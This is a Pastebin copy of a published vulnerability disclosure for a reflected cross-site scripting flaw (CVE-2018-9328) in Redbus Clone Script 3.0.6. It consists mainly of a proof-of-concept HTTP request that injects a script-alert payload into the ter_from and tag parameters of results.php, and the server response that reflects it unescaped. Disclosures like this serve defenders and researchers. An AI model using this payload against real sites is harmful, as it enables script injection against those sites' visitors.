Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: Redbus Clone Script 3.0.6 - Cross-Site Scripting
- # Date: 22.03.2018
- # Vendor Homepage: https://www.phpscriptsmall.com/
- # Software Link: https://www.phpscriptsmall.com/product/redbus-clone/
- # Category: Web Application
- # Exploit Author: ManhNho
- # Version: 3.0.6
- # CVE: CVE-2018-9328
- # Tested on: Window 10
- PoC
- --------------------------------------------------------------
- Request:
- GET /~materialmag/demo/redbus-clone-responsive/results.php?triptype=1&ter_from=%27);%3Cscript%3Ealert(%221%22);%3C/script%3E&tag=%27);%3Cscript%3Ealert(%221%22);%3C/script%3E&datepicker=23-03-2018&datepicker1=&type=bus HTTP/1.1
- Host: <Target>
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-GB,en;q=0.5
- Accept-Encoding: gzip, deflate
- Cookie: PHPSESSID=a26646fb257df1e606dbd65bbb67cfa2
- Connection: close
- Upgrade-Insecure-Requests: 1
- --------------------------------------------------------------
- Response:
- HTTP/1.1 200 OK
- Date: Thu, 22 Mar 2018 09:48:34 GMT
- Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
- X-Powered-By: PHP/5.4.45
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Connection: close
- Content-Type: text/html
- Content-Length: 48308
- ...
- <div class="row" style="background-color: #435255; color: #fff; padding: 10px 10px 0px 10px;">
- <div class="container text-center" >
- <div class="col-md-1"><button style="margin-bottom: 10px;" type="button" onclick="change_val();" class="btn btn-danger">Modify</button></div>
- <div class="col-md-5" style="border-right: solid 1px #ccc; margin-bottom: 10px;">
- <span style="font-size:14px; color:#fff; "> <strong>Journey Date</strong> </span>
- <span ><a href="results.php?ter_from=');<script>alert("1");</script>&tag=');<script>alert("1");</script>&datepicker=23-03-2018&backward"><img src="images/bef.JPG" width="24" height="24"/></a></span>
- <span style="font-size:12px; color:#fff; vertical-align:center;">23-03-2018</span>
- <span> <a href="results.php?ter_from=');<script>alert("1");</script>&tag=');<script>alert("1");</script>&datepicker=23-03-2018&forward"><img src="images/aft.JPG" width="24" height="24"/></a> </span>
- </div>
- <div class="col-md-6"></div>
- </div>
- </div>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement